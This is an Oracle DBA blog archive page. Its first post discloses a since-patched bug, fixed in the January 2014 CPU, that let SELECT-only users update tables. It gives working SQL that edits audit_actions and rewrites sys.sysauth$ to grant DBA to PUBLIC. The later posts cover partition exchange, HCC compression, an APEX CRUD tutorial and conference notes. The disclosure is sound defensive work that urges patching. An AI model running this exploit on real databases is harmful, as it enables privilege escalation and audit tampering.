Category: Oracle

June 18th, 2014 by mathias

A friend and at the time co-worker at Kentor AB found this bug. He found the bug and had the tenacity to track down and prove that it was a bug and not just a flaw in the logging mechanism where this first was indicated to occur.

Today is the day when I can finally speak about a bug I asked for a peer review on over a year ago. I had to pull that blog post offline when it was clear that we had in deed found what I think is a monster bug. It was difficult to fix so while it was quiet online about the bug, Oracle was hard at work on fixing it. In fact it turned out to be two different bugs each plugged separately.

Before we get to the meat of the issue, have you applied the January 2014 CPU? No? OK, we’ll wait while you take care of that. Trust me, you want to have it installed. Back already?¬†Good. Patching really doesn’t take too long. ūüôā

I’ve spent a number of years trying to very diligently apply the correct grants for different users to make sure every user had just what they needed. It turns out it was a wasted effort. Had the users known about this bug, they could have circumvented their lack of access. Truth be told, I really have no idea if someone did. In fact the bug was such that it was abused in production at a large Oracle shop by mistake. This bug is present in all versions of the database (as far as we know) and it has been fixed with the latest CPU for 11g and 12c. If you run on an older version, you should upgrade now! Running older than 11 at this point probably means you’re not reading blogs about databases anyway.

So what exactly is the bug then? In short, you can update data in tables you only have select rights on. How can that be, you’ve tested that multiple times. True, the SQL has to be written in a¬†pretty specific way to trigger the bug. In a database that is a base install or at least predates the january CPU, the following test case should prove the issue. You can use most of this to verify the problem, you will probably not ant to test with privilege escalation in a production system though.

Let us first create som users for our test.

drop user usra cascade;
create user usra identified by usra default tablespace users;
alter user usra quota unlimited on users;
grant connect to usra;
grant create table to usra;
--
drop user usrb cascade;
create user usrb identified by usrb;
grant connect to usrb;
grant create view to usrb;
--
drop user usrc cascade;
create user usrc identified by usrc;
grant connect to usrc;
grant select any dictionary to usrc;

We create a user usra that can create tables, usrb that can create views and usrc that can only select from the dictionary. These users will allow us to test the different versions of this bug in a controlled fashion.

Lets set up a test table in the usra account.
create table t1 (col_a varchar2(10) not null);
insert into t1 (col_a) values ('Original');
--
commit;
--
grant select on t1 to usrb;

We now have a table with a single row that usrb can only read from, or so we would think. Let us first create a very basic view and try to update it.
drop view view1;
create view view1 as select * from usra.t1;
update view1 set col_a = 'Whoops1';

So that didn’t work. Or rather, the view was created but the update failed. That is how it should be, we have no update access on the table.

Lets now try to create a view on that view which we then update to see what happens if we add just a little bit of complexity to this.

drop view view2;
create view view2 as select * from view1 where col_a in (select max (col_a) from view1 group by col_a);
update view2 set col_a = 'Whoops2';

This update suddenly works (before the above mentioned CPU). So our meticulously granted privileges are overridden by a view with a sub-select on the same view. Not good.

Could the sub-select be simplified? Does it need to select from the same view and is an aggregation needed to make this bug expose itself?

drop view view3;
create view view3 as select * from view1 where 1 in (select 1 from dual);
update view3 set col_a = 'Whoops3';

Apparently it could not be simplified enough to just do a sub-select from dual. On to other possible simplifications.

What if we just read a hard-coded value from the first row in the table, would that work?
drop view view4;
create view view4 as select * from view1 where 1 in (select 1 from view1 where rownum = 1);
update view4 set col_a = 'Whoops4';

Yup, that is enough to break through the privileges.

How about just using a select without even having to have the right to create a view?
update
(with x as (select * from usra.t1) select * from x) t1
set col_a = 'Whops5';

Ouch. That too was possible. So all it takes is a select access on a table and we can update it. How do we stop someone from abusing this when not even a pure select with no right to create objects is enough? You see why we pulled the original blog-post? This was for a time something that would be very hard to defend your database against.

How about using it to update things in the data dictionary, yes that too is possible. Some things are available to any user such as user_actions.

update
(with x as (select * from audit_actions) select * from x) t1
set name = 'Mathias was here';

This update also works. So auditing can be changed, probably not a good thing if you trust your audit_actions table.

How about escalating the privileges we have (or rather that anyone has). Yes, that is also possible with a bit of knowledge.

select * from sys.sysauth$
where grantee# = (select user_id from all_users where username = 'HR')
and rownum = 1;

Here we steal a privilege held by the HR user, probably a privilege that will not be missed for a long time in most databases. With this we will make public a proper DBA user meaning that any account can do almost anything in the database.

update
(with x as (select * from sys.sysauth$ where grantee# = 103 and privilege# = -264 and sequence# = 1551)
select * from x) t1
set grantee# = 1
,privilege# = 4;

Just like that we have given ourselves and everyone else DBA access. Now we can do whatever we want including covering our tracks in most databases.

So I ask again, are you *really* sure that your database is secure?

This is scary stuff and this only goes to show that even a mature product needs to be kept up with current patches. If you are not on a CPU from this year, PLEASE give it a high priority to make it happen today.

And PLEASE do not test this in production. If you do and your DBA catches you, he will lecture you forever if not reporting you up the chain of command. But please do spread the word that this issue exists and needs to be plugged ASAP.

Posted in Bug, DBA, Oracle, Security

June 12th, 2013 by mathias

Wrap-up

This is the last post in this series and I’ll not introduce anything new¬†here, but rather just summarise the changes explained and talk a bit about the value the solution delivers to the organisation.

Let’s first review the situation we faced before implementing the changes.

The cost of writing the log-records to the database was that all the parallell writing from many different sources was such that it introduced severe bottlenecks to the point that the logging feature had to be turned off days at a time. This was not acceptable but rather than shutting down the whole system which would put lives in immediate danger, this was the only option available. Then even if that would have been fast enough, the moving of data was taking over twice the time available and it was fast approaching the point where data written in 24 hours would take more time to move to the historical store for log-data. That would of course have resulted in an ever growing backlog even if the data move was on 24×7. On top of that the data took up 1.5 TB of disk space, costing a lot of money and raising concerns with out ability to move it to EXADATA.

To resolve the issue during business hours of having contention causing a crippling impact on the overall system, we changed the table setup to not have any primary keys, no foreign keys and no indexes. We made the tables partitioned such that we get one partition per day.

To make the move from operational tables to historical tables faster, we opted to have both in the same instance on EXADATA. This allowed us to use partition exchange to swap out the partition from the operational table and swap it into the historical table. This took just a second as all we did was updating some metadata for which table the partition belongs to. Note that this ultra fast operation replaced a process that used to take around 16 hours, for which we had 6.5 and the time it took was expanding as business was growing.

Finally, to reduce the space consumed on disk we used HCC – Hybrid Columnar Compression. This is an EXADATA only feature for compressing data such that columns with repeating values gets a very good compression ratio. We went from 1.5 TB to just over 100 GB. This means that even with no purging of data it would take us over five years to even get back to the amount of storage this used to require.

So in summary

  • During business hours we use 20% of the computing power and even less of the wall clock time it used to take,
  • The time to move data to the historical store was reduced from around 16 hours to less than one second.
  • Disk space requirement was reduced from 1.5 TB to just over 100 GB.

And all of this was done without changing one line of code, in fact there was no rebuild, no configuration change or anything to allow this drastic improvement to work with all the different systems that was writing to these log-tables.

One more thing to point out here is that all these changes was done without using traditional SQL. The fact that it  is an RDBMS does not mean that we have to use SQL to resolve every problem. In fact, SQL is often not the best tool for the job. It is also worth to note that these kinds of optimisations cannot be done by an ORM, it is not what they do. This is what your performance or database architect needs to do for you.

For easy lookup, here are links to the posts in this series.

  1. Introduction
  2. Writing log records
  3. Moving to history tables
  4. Reducing storage requirements
  5. Wrap-up (this post)

Posted in DBA, EXA, Oracle, Partitioning, Performance Tagged with: , , ,

June 5th, 2013 by mathias

Reducing storage requirements

In the last post in this series I talked about how we sped up the move of data from operational to historical tables from around 16 hours down to just seconds. You find that post here.

The last area of concern was the amount of storage this took and would take in the future. As it was currently taking 1.5 TB it would be a fairly large chunk of the available storage and that raised concerns for capacity planning and for availability of space on the EXADATA for other systems we had plans to move there.

We set out to see what we could do to both estimate max disk utilisation this disk space would reach as well as what we could do to minimize the needed disk space. There were two considerations  minimize disk utilisation at the same time as query time should not be worsened. Both these were of course to be achieved without adding a large load to the system, especially not during business hours.

The first attempt was to just compress one of the tables with the traditional table compression. After running the test across the set of tables we worked with, we noticed a compression ratio of 57%. Not bad, not bad at all. However, this was now to be using an EXADATA. One of the technologies that are EXADATA only (to be more technically correct, only available with Oracle branded storage) is HCC. HCC stands for Hybrid Columnar Compression. I will not explain how it is different from normal compression in this post, but as the name indicates the compression is based around columns rather than on rows as traditional compression is. This can achieve even better results, at least that is the theory and the marketing for EXADATA says that this is part of the magic sause of EXADATA. Time to take it out for a spin.

After having set it up for our tables having the same exact content as we had with the normal compression, we had a compression rate of 90%. That is 90% of the needed storage was reduced by using HCC. I tested the different options available for the compression (query high and low as well as archive high and low), and ended up choosing query high. My reasoning there was that the compression rate of query high over query low was improved enough and the processing power needed was well worth it. I got identical results on query high and archive low. It took the same time, resulted in the same size dataset and querying took the same time. I could not tell that they were different in any way. Archive high however  is a different beast. It took about four times the processing power to compress and querying too longer and used more resources too. As this is a dataset I expect the users to want to run more and more queries against when they see that it can be done in a matter of seconds, my choice was easy, query high was easily the best for us.

How do we implement it then? Setting a table to compress query high and then run normal inserts against it is not achieving a lot. There is some savings with it, but it is just marginal compared to what can be achieved. For HCC to kick in, we need direct path writes to occur. As this data is written once and never updated, we can get everything compressed once the processing day is over. Thus, we set up a job to run thirty minutes past midnight which compressed the previous days partition. This is just one line in the job that does the move of the partitions described in the last post in this series.

The compression of  one very active day takes less than two minutes. In fact, the whole job to move and compress has run in less than 15 seconds for each days compression since we took this solution live a while back. That is a time well worth the 90% saving in disk consumption we achieve.

It is worth to note that while HCC is an EXADATA feature not available in most Oracle databases, traditional compression is available. Some forms of it requires licensing, but it is available so while you may not get the same ratio as described in this post you can get a big reduction in disk space consumption using the compression method available to you.

With this part the last piece of the puzzle fell in place and there were no concerns left with the plan for fixing the issues the organisation had with managing this log data. The next post in this serie will summarise and wrap up what was achieved with the changes described in this serie.

Posted in DBA, Oracle, Partitioning, Performance Tagged with: , , ,

March 15th, 2013 by mathias

In this post I’ll finish up the CRUD implementation using records, procedures and views. This series of blog posts started with this¬†post which was followed by this.

At this point we have a working report that links to a form. The report is based on a view and the form is based on a procedure. At this point the form is only loading the record in using a procedure that uses a record in its signature. In this post we’ll complete the functionality by using the same form for insert, update, and delete functionality.

Let’s start with adding a mode page item to the form. We will use this to know if the form is invoked in insert or in update/delete mode.

  • Right-click on “Form on Stored Procedure” on the page where your form is (page 4 in my example)
  • Select “Create Page Item”
  • Select Hidden
  • Give the page item a name, like P4_MODE.
  • Click “Next”
  • Click “Next” (again)
  • Select “Create Item”

You now have a new page item which is not displayed, but whose value you can reference on this page.

To make this example easy, we’ll start with just implementing update functionality. But first we’ll go to the report and change this link column to pass in a “U” for the mode page item when it is clicked.

In the page with the report, perform the following steps.

  • Right-click “List of Employees”
  • Click “Edit Report Attributes”
  • Scroll down to “Link Column”
  • For Item 2, enter the name and value we want the newly created page item to be set to. P4_MODE and U in my case.
  • Apply Changes

Now with that done, let’s head back to the page with the form. But before we make any changes there, we need to change the package to add a procedure for updating a row in the emp table.

Here is the code for the procedure we’ll use.

create or replace package tb_access as
  type t_emp_rec is record (empno emp.empno%TYPE
                           ,ename emp.ename%TYPE);

  procedure read_emp(p_in_empno     in emp.empno%type
                    ,p_out_emp_rec out t_emp_rec);

  procedure write_emp(p_in_empno    in emp.empno%type
                     ,p_in_emp_rec  in t_emp_rec);
end tb_access;
create or replace package body tb_access as
  procedure read_emp(p_in_empno in emp.empno%type
                    ,p_out_emp_rec out t_emp_rec) is
    begin
      select empno
            ,ename
        into p_out_emp_rec.empno
            ,p_out_emp_rec.ename
        from emp
       where empno = p_in_empno;
  end read_emp;
----------------------------------------------------
  procedure write_emp(p_in_empno   in emp.empno%type
                     ,p_in_emp_rec in t_emp_rec) is
    begin
      update emp
         set ename = p_in_emp_rec.ename
       where empno = p_in_empno;
  end write_emp;
end tb_access;

This code adds the procedure write_emp wich also takes empno and the record used for read_emp, only this time they are both in parameters as we’ll not return any data from the procedure that writes to the table. The actual code in the procedure is a very simple update that sets the name to the ename in the record for the row that has the empno passed in.

With this in place we’re ready to change the form to call this procedure upon submit. We do this by taking the code used for reading in the record (The process in page rendering) and put it into the “Run Stored Procedure” process we commented out in page processing.

The code we copy looks like this:

declare
  in_emp_rec tb_access.t_emp_rec;

begin
  tb_access.read_emp(p_in_empno    => :p4_empno
                    ,p_out_emp_rec => in_emp_rec);

  :p4_ename := in_emp_rec.ename;
end;

Replace the code in “Run Stored Procedure” with the above and change it to look like this:

declare
  in_emp_rec tb_access.t_emp_rec;

begin
  in_emp_rec.ename := :p4_ename;

  tb_access.write_emp(p_in_empno    => :p4_empno
                     ,p_out_emp_rec => in_emp_rec);
end;

In the “Run Stored Procedure” change the condition to “- Select condition type -” to not have a condition for when the process is executed. It is currently conditioned on running only when the save button is clicked, leave that condition on for now.

With that in place, it is time to test the functionality of the forms new functionality. Run the report, click on the link and update the name of an employee. Assuming you followed the above and got the changes made in the right places, the form will now update the name of the employee.

The next step in this will be to add insert functionality to the form. First off is to set up the package to support inserting an employee. As we’re now going to have both insert and update through the same procedure, we need to include the mode in the signature of the procedure.

Let’s first update the package specification so the write_emp looks like this:

  procedure write_emp(p_in_empno    in emp.empno%type
                     ,p_in_mode     in varchar2
                     ,p_in_emp_rec  in t_emp_rec);

The procedure in the package needs to be updated to look like this:

  procedure write_emp(p_in_empno   in emp.empno%type
                     ,p_in_mode    in varchar2
                     ,p_in_emp_rec in t_emp_rec) is
    begin
      case p_in_mode
        when 'U' then
          update emp
             set ename = p_in_emp_rec.ename
           where empno = p_in_empno;
        when 'I' then
          insert into emp
             (empno
             ,ename)
           values((select max(empno) + 1 from emp) 
                 ,p_in_emp_rec.ename);
      end case;
  end write_emp;

Before the form is functional again, we need to change the call in “Run Stored Procedure” to match the new signature of write_emp.

declare
  in_emp_rec tb_access.t_emp_rec;

begin
  in_emp_rec.ename := :p4_ename;

  tb_access.write_emp(p_in_empno    => :p4_empno
                     ,p_in_mode     => :p4_mode
                     ,p_in_emp_rec  => in_emp_rec);
end;

With that change in place the form now works and the mode we set on the link column is now passed to the procedure to make sure an update is performed and not an insert.

To introduce insert functionality, we want to add a new button on the page with the report that invokes the form in insert mode. To add the button follow these steps on the page with the report.

  • Right-click on “List of Employees”
  • Select “Create Region Button”
  • Set name and label to “Add”
  • Click Next
  • Set position to “Right of Interactive Report Search Bar”
  • Set Alignment to “Left”
  • Click Next.
  • Select action “Redirect to Page in this Application”
  • Set the page to your form-page (4 in my example)
  • Set Request to INSERT
  • Set “Clear Cache” to 4
  • Set “Set these items” to P4_MODE
  • Set “With these values” to I.
  • Click Next.
  • Click “Create Button”

If you test the page, you’ll see that it ends up¬†immediately¬†to the right of the search bar. Do not click on the button just yet.

Now go to the page with the form and open the process in rendering (Read Emp).

  • Set “Condition Type” to “Value of item / column in expression 1 = expression 2”.
  • Set Expression 1 to P4_MODE.
  • Set Expression 2 to U
  • Apply Changes

This ensures that we’re only reading a row from emp when updating data. When inserting, there is no data to be read and displayed.

You may also want to set the same condition on the page item for empno to hide it when inserting as there is no empno to display then.

Test the function now by running the report page and click on the “Add” button. It adds a row with the name you enter on the form. The rest of the columns will have null as their value. Adding more columns in the procedures and on the form is an¬†exercise¬†left to the reader.

With the function now supporting insert and update, it is time to add the delete function so we can get rid of some of the test employees we’ve created. This function will be implemented only on the form and by adding supporting code in the package. Thus, the delete will be performed by clicking on the link and then clicking on a delete button on the form.

To implement this we’ll update the implementation of the write_emp procedure once more.

  procedure write_emp(p_in_empno   in emp.empno%type
                     ,p_in_mode    in varchar2
                     ,p_in_emp_rec in t_emp_rec) is
    begin
      case p_in_mode
        when 'I' then
          insert into emp
             (empno
             ,ename)
           values((select max(empno) + 1 from emp) 
                 ,p_in_emp_rec.ename);
        when 'U' then
          update emp
             set ename = p_in_emp_rec.ename
           where empno = p_in_empno;
        when 'D' then
          delete from emp
           where empno = p_in_empno;
      end case;
  end write_emp;

With the package updated, our next step is to change the code in the “Run Stored Procedure” process on the form page.

declare
  in_emp_rec tb_access.t_emp_rec;
  v_mode     varchar2(1);
begin
  in_emp_rec.ename := :p4_ename;
  v_mode           := :p4_mode;

  if :REQUEST = 'DELETE' then
    v_mode := 'D';
  end if;

  tb_access.write_emp(p_in_empno    => :p4_empno
                     ,p_in_mode     => v_mode
                     ,p_in_emp_rec  => in_emp_rec);
end;

The code is now changed such that a click on the delete button (not implemented yet) will set the mode to D. This is done by checking the REQUEST which we will set to DELETE for the button we’ll create now. REQUEST is a standard attribute available on buttons and branches in APEX. By setting it to a unique value, we can check for different invocation methods in code. This allows us to deal with different scenarios with just one block of code.

To add the button, follow these steps.

  • On the form-page, right-click on “Form on Stored Procedure”.
  • Select “Create Region Button”
  • Set “Button Name” and “Label” to “Delete”.
  • Click Next
  • Set “Position” to “Top of Region”
  • Set Alignment to “Left”
  • Click Next
  • Click Next (again)
  • Click Create Button

The value of “Button Name” is used to set REQUEST when the page is submitted. With this in place our form should now support deleting rows also. Update the branch on the page to not have a condition on the button pressed. Take it out for a spin.

There is one thing left to do, hide the delete button when the form is invoked to add a row.

  • Right-click the delete-button under rendering.
  • Select “Edit”.
  • Scroll down to conditions.
  • Set “Condition Type” to “Value of item / column in expression 1 = expression 2”.
  • Set Expression 1 to P4_MODE.
  • Set Expression 2 to U
  • Apply Changes

Now you’ve got a CRUD solution based on an interactive report with a form that supports insert, Update, and Delete. The total amount of code required is very small and you still have isolated the APEX-application from changes to the table structure by using a view, even the record can have fields added to it without impacting the functionality of your application. Developing using the demonstrated methods here allows you to create these applications almost as fast as with making them table based, but you have much more control and can make a lot of changes without touching the application,

Posted in APEX, Oracle, PL/SQL, SQL

April 13th, 2011 by mathias

Quite a while ago I wrote about how to seup the alert log as an external table. Since then 11g has been introduced and is now widely used. It of couse changes the location and makes the alert log an xml file.

While it is possible to select from it using xml functions like Laurent Schneider does here, it is still a bit cumbersome.

Tanel Poder (@TanelPoder) found a nicer way by using X$DBGALERTEXT which does a really nice job of parsing the xml-file into a lot of different columns. A friend at work, Daniel Ekberg, let me know about it a while back. I just never got around to looking into it until today.

It is very nice but there is one slight issue with it. It is X$ and thereby only available to SYSDBA. That can of course be solved with a view and proper grants and synonyms. However, views on X$ can cause some issues during upgrades so such views should probably be dropped before upgrading.

While not documented, this is a neat way to gain access to a lot of information from the xml.log (alert-log).

Posted in Alert Log, DBA, Oracle, SQL, XML

October 3rd, 2010 by mathias

Yes, this post is a little out of order as it clearly didn't take place after the Thursday afternoon sessions. I missed it during the conference so I had to catch up on it later on the on demand site. I thought it was interesting enough to write up a few notes.

It was held by Tom Kyte and the subject was "What's new in database development". It'd be more correct to say Oracle development than database development as he covered just about any area that Oracle focuses on.

He started with APEX and spent a lot of time on it. The coverage APEX gets in general sessions and the number of really good APEX sessions speaks volumes about how strong APEX is becoming within the Oracle development technologies.

Tom shared a little background of how APEX was built by Mike Hitchwa when Mike set next to Tom and wrote the initial code for APEX. Anyone that has been impressed with the way bind variables are handled in APEX got their explanation for why. Tom has relentlessly been preaching about how to to it and the issues caused when not done well. So it all makes sense when you hear that it was Tom who wrote the initial code for bind variable handling in APEX.

Tom went on to say that they are seeing a lot of momentum behind APEX right now. The catch phrase he used to explain why it grows fast in popularity was "Easy architecture, easy to deploy, and easy to run".

Tom then spent some time talking about performance of APEX as a lot of people still thinks it is not able to handle enterprise level system demands.

The site apex.oracle.com that is used to run all the applications people create on Oracles hosted apex "test and demo" site has a surprisingly small computer running it. The specifications for it is:

  • Poweredge 1950
  • 2 Dual core Xeon 2.33 Ghz
  • 32 GB Ram
  • Cost : $4,300 (in 2007)
  • Runs 11G database

Not a very big computer to serve a site that provides support to anone who wants to try APEX.

Tom shared som of the numbers for what apex.oracle.com is used for.

  • They had 3.5 million views (pages loaded and processed) last week.
  • Distinct users accessing during the week: 3028
  • Total workspaces :9062
  • Applications: 32776

I'd think most "enterprise" systems would have less demand than that.

Some of the biggest things on apex.oracle.com are:

  • SQL Developer updates 800K hits /week
  • Pro MED (Prodution system) 770K hits / week
  • Asktom 250K-1000K hits / week
  • APEX Appbuilder 238K hits / week
  • JDeveloper updates 175K hits / week

Impressive to serve all of that from a small(ish) computer.

Tom then shared some key features from the 4.0 release.

Websheets

Designed for the enduser and designed for webbased content sharing. A solution that allows endusers to stop mailing exceldocuments around would be a good thing…

Dynamic Actions

Declarative client-side behavior. It is integrated in the framework. Uses JQuery.

This allows using common javascript function for handling advanced user interface improvements. From validations to drag and drop and more.

Team Development

Allows you to manage the application development process within APEX. This makes APEX able to be used by large development projects. It has built in end-user feedback. When a user has a problem they can tell you directly in the application and it feeds into the team development features.

Oracle APEX Listener

Built in Java.

It is a good alternative to mod_plsql and it is certified against WLS and Glassfish.

After that long piece on APEX, Tom went through som improvements for other technologies.

SQL Developer

The datamodeller is now free. It will now come with the product and will be supported with the database (just like SQL Developer itself).

It has real-time SQL monitoring. It will allow you to see what part of the execution plan Oracle is currently spending time in for a SQL. This exists in Enterprise Manager, but this gives the insight to many more as EM often is just used by the DBAs.

It can now find the SQL trace file and display the contents graphically in SQL Developer. This ought to make trace files much more accessible to developers.

It has support for AWR and ASH reports and has added developer specefic things that are not available in the other AWR/ASH aware tools.

A hierarchical profiler is now also included to allow you to see what functions calls which in a run of PL*SQL code.

SQL Developer now used PL/SCOPE data to show information about where variables are defined and used, This is something that has been added to the database and can alays be accessed with SQL, but it is more convenient to have it hooked into the development tool.

They have also added a DBA Navigator that allows DBAs to access most things they deal with in the database. Most objects (such as extents and tablespaces) can be seen and modified.

An interface for DBMS_SCHEDULER has been added. It is supposedly a much nicer way to configure jobs than to do it by have, which can be both tedious and complicated.

Another neat feature is that auto tracing has been improved to not only allow tracing of a statement, you can now trace two statements and see a comparison report of the tracing so you can compare them. Since this usually has been done with Toms "Runstats" package, I'd assume this feature has Toms fingers all over it.

ODP.Net

It is free and provides native access to the database. It has statement caching (on the client side) and will support TimesTen in 11.2.0.2.

I'm not a .Net person at all , but it sounds as if this provides a lot of benefits both in use and in performance. If you work with .Net, then you will want to take a look at all the things Oracle provides in this area.

Java

There is a Universal Connection Pool for all technologies using connection pools to use. This is supposed to reduce the overhead caused by having several connection pools.

For Secure Files there has apparently been a performance issue dealing with very large files, my understanding from Toms presentation is that it resulted in double buffering. Now there is Zero Copy which sounded as if it would remove all buffering and thereby improve the speed significantly.

Database Improvements

Tom focused on the optimizer and on developer related topics as this was a Develop keynote.

Tom showed how the optimizer could detect a three-way join that was not needed. It was a fairly complicated situation, but the optimizer can apparently completely skip accessing tables now if they are not needed for the end result.

PL*SQL

Edition based redefinition is available in a editions of 11G. Tom thinks this is the killer feature of 11G, and says that it may be the first time the killer feature is available in all editions and with no additional licensing requirements.

It allows live changing of code (PL and views). Live changing of data can already be done with online redefinition and online actions on indexes.

The process now is:

  • Create new edition
  • Test new edition of the code while users still use the old.
  • Two options for rolling out
    • Let new sessions use the new one and allow old to keep using the old edition.
    • Switch everyone over to the new when the system is "idle". Takes just seconds.

That was the end of Toms presentation. He covered a lot of technologies, even some that are not mentioned above (like Ruby). WHat I think is interesting is what wasn't mentioned at all.

The fist one that comes to mind is JDeveloper. It has not become very popular with Java purists and it is not mentioned at all. There are some rumors of it being de-emphasized by Oracle as how you work with it seems to be very far from how most Java projects want to organize their builds and deployments.

Next interesting omission is the technology mostly integrated with JDeveloper. No mention at all on the Oracle Develop for their key Java development framework. ADF did not get any love at all and that is not true just for this presentations, there were very few mentions of it in any of the presentations I attended. True, I did not seek out ADF sessions, but virtually every single presentation on non APEX technologies found a way to talk about APEX, the oposite was true for ADF. Even when you felt that someone was building up to a plug for ADF, they never went there.

The lack of love for ADF and JDeveloper may mean that they are not considered critical to Oracles success anymore. I assume ADF was used to build the fusion applications which would mean that the tool and product is probably not going away, but could it mean that they are primarily being focused for large product development and not something that is good for custom development projects?

Personally it feels as if ADF is now essentially becoming a tool used when integrating with Oracle (fusion) Apps or Oracle SOA Suite. I'm not sure a custom development project would end up using ADF. Of course there will be exceptions to that, but they will probably be fewer and fewer.

It could also be that JDeveloper and ADF starts becoming less and less of something for the customers and more and more of an internal tool at Oracle. I'm sure they have very specialized versions and techniques used in development to help the development of the fusion applications.

On the other hand, it could just be that this wasn't the time for releasing improvements to JDeveloper or ADF. I have trouble convincing myself of that though. The reason is that Oracle now owns Java and if there ever would have nee a reason to show JDeveloper and ADF in its full glory, now would have been the time. By not releasing improvements to what is considered problems with JDeveloper and ADF, they have probably given more momentum to the competing tools. They of course ha another tool in this space now, maybe NetBeans will be the future migration path of JDeveloper and when ADF finds a new home.

Posted in APEX, DBA, OOW, Oracle, Performance, SQL

October 1st, 2010 by mathias

For the afternoon I had two sessions I attended. The first was "Quantifying Oracle Performance" and the second was "The X-files – Managing exadata and highly available databases". I anticipated both to be great and possible be among my favorites for the week.

Unfortunately neither met my expectation, so this is going to be a fairly short post.

The first one was "Quantifying Oracle Performance" with Craig Shallahamer, I have seen many presentations with Craig and he has always been good and his material very interesting. Even if you do not use queueing simulations at work, having seen his presentations on how it affects performance helps when trying to understand system performance. This presentation was intended to help you build a model where you could show where your solution is today on a response time curve, i.e. where in the famous elbow are you now and where would different changes put you.

Craig showed some parts of how to model your current performance and to use AWR to figure out some numbers to use. However, there was virtually no data on how to model a planned change. I guess you have to implement and test that change with production like load to get the same data and then be able to plot it on the same graph as you created for your current solution.

I think the idea of showing non technical users the impact and how close to instability you currently are in a graphical manner is very good, as is the idea of comparing possible alternative solutions with it. However, I think the participants get only this idea and they have to do a lot of work on their own to make this a model they can use to work with their clients.

So, (sorry Craig) this did not feel like a presentation that is complete at this point. I do believe it could be a great one if it reaches its goal but I don't think it is there yet.

The next one was "The X-files – Managing exa databasemachine and highly available databases" and this was not one that fell short of the goal, it did not even make an attempt at meeting it. Pure bait and switch.

To explain this better here is the abstract

The Oracle Exadata is a complete package of software, servers, storage, and networking designed for all data processing and data management challenges. In this session, experts will walk you through Oracle maximum availability architecture best practices for managing this critical piece of your operating infrastructure through Oracle Enterprise Manager. They will also provide additional guidance on troubleshooting the Oracle Exadata and Oracle high-availability database solutions.

I read that as a session that will talk about how I should set things up snd how to achieve a HA-solution that is stable and can be proactively managed. What I got was a long session about how I should fork over money to ACS (Advanced Customer Support). Yes, ACS is probably great and big and important installations should probably have them as their dedicated Oracle support. However, knowing how to take care of your own solution is what I expected from the abstract and there was non of it. This was instead a one hour long plug for ACS.

I took away two things. The first is that a lot of work has been done to make EM monitor all aspects of an exadata box. It looks like they have a lot of interesting information. Unfortunately access to a lot of it seems to require using ACS and the appliance they put in place to aggregate information. The other thing is that setting up dataguard via EM now looks really easy. Maybe it is time to start using EM for setting up DG.

There was a brief mention of a tool that can estimate the benefit of using exadata based on a SQL tuning set. It was called something like "SPA exa database machine simulator".

Posted in OOW, Oracle, Performance

September 29th, 2010 by mathias

The day starts with a presentation b6 Tom Kyte about "What else can you do with system and session data".

Tom starts with reviewing the history of tuning an Oracle database.

The prehistoric era (v5) required writeing debug code as that was the only way to get any information about what the code did.

The dark ages followed (v6) and now Oracle introduces:

  • Counters/ratios
  • bstat/estat
  • SQL Trace
  • The first few (7?) v$-views are introduced

In the rainessance era (v7) introduced a few more things:

  • The wait event instrumentation was introduced
  • Move from counters to timers
  • Statspack

The modern era (v10) introduced the tools we prefer today

  • DB-Time tuning
  • Multiple scoping levels (AWR)
  • Always on, non-intrusive
  • Bult into the infrastructure – instrumentation, ASH, AWR, ADDM, EM

DBA_HIST_* views is where the historic data is located.

Tom contunued with discussing the metrics and the timemodel and how to join that to get data about them. However, all his presentations are available for everyone and you're better off reading them on his site than getting a summary of it here.

As usual, Tom places his presentations and other things under files on asktom.

The next presentation was Apex debugging and tracing with Doug Gault from Sumneva.

Debug mode is truned off on the app level by default. It neds to be enabled there before it can be used.

Debug data is now written to a table, and not dumped on the webpage as before. It is viewed by clicking view debug in the developer bar in the APEX interface.

Use conditional display to output things only in debugmode (using v('DEBUG') ).

Things that happens on a page after it has been rendered will not be captured. This is things like javascript running on this client.

APEX_DEBUG_MESSAGE is currently undocumented, but the code shows how to use it.

Debugging can be turned on/off on the page programmatically.

Logging from you own code allows you to see what parts of a package call it is that takes the time.

Doug then shows a few different ways to collect and report on the debugdata for a report.

I recommend looking at the presentation for ideas on how to use it and what can be done. Unfortunately this presentation does not seem to be available on the sumneva website at this point. If you are interested in it, send an email to them asking if they are willing to share it on their presenation page. You'd of course want to check their site first to make sure it isn't uploaded between the time I write this and the time you read it.

 

Posted in APEX, OOW, Oracle, Performance, SQL

September 23rd, 2010 by mathias

Wednesday starts off with a presentation about a new feature in APEX 4.0 that I have not had a chance to look into. It is how you use and develop plugins. The presentation was held by Patrick Wolf who is also the developer of the plugin feature.

Scott began by showing how a plugin is used (that is using a plugin compared to developing it).

You install a plugin by selecting plugins in the shared components section, and then it is just a standard APEX import.

Using a plugin has the benefit that it is declarative while using javascript directly requires codechanges and explicit inclusion of necessary code on every page it is used on.

Once installed, the use of it is identical to using other supplied item types in APEX. It is like the plugin was part of the product.

The productivity is much better than it is with just using javascript as once you have the plug in it is just a matter of selecting it to be used and not having to change code to match what you need.

There are already many plugins available and more are added all the time.

Patrick recommends starting with finding a JQueryplugin that performs the action you want and then truing it out on a static html page. When that works, you're ready to create an APEX plugin for it.

When developing an APEX plugin, you need to follow certain API guidelines to make sure your functions has the signature they are expected to accept.

Patrick them moved on to showing how a plugin is developed.

You create your plugin in shared components and then it is a matter of providing calls to the plsql code you write to generate the html and other things that are needed.

Patrick finished up with some recommendations for developing plugins and they are similar to what you would expect in any weboriented technology.

Always escape all data, both from the database and from the browser. Not doing that opens a risk of criss site scripting attacks. There is a function available for this, I believe it is sys.htf_escape_cs (possible typo as I wrote it from memory after he moved on to his next slide).

Reference apex.jquery in the code to make sure the apex supplied version of jquery is used.

Do not trust client side checks on data as the can easily be overridden. The same checks has to be performed on the server side also.

Look at Oracles Best Practice plugins to get a feeling for what to do and how to do it. They have lots of comments to guide you.

Use the packages apex_plugin_util, apex_javascript, apex_css.

Test your pliugins with more than one item using it on a page.

Patrick recommends avoiding inline css and javascript when it becomes a lot to make sure the page loads faster.

Patrick finished up with reminding us to share plugins when it is possible to do so.

The only other presentation for the morning was a handson allowing the participants to repeat the steps that Patrick had just done. As with many handson exercises it was too much of following a set of steps with instruction to click here or there and to type this or that into different places. Though useful it is not creative enough to allow me to fully understand the process. That can however be done some other time when I have a need to develop a real plugin.

Posted in APEX, OOW, Oracle

September 22nd, 2010 by mathias

The afternoon was kicked off with a presentation on using APEX in large projects by Dimitri Gielis. These re my notes for what Dimitri told us.

Many people feels that APEX cannot be used for anything larger than a singe developers app. 

Sumneva uses EC2 for both demo and development work with their clients.

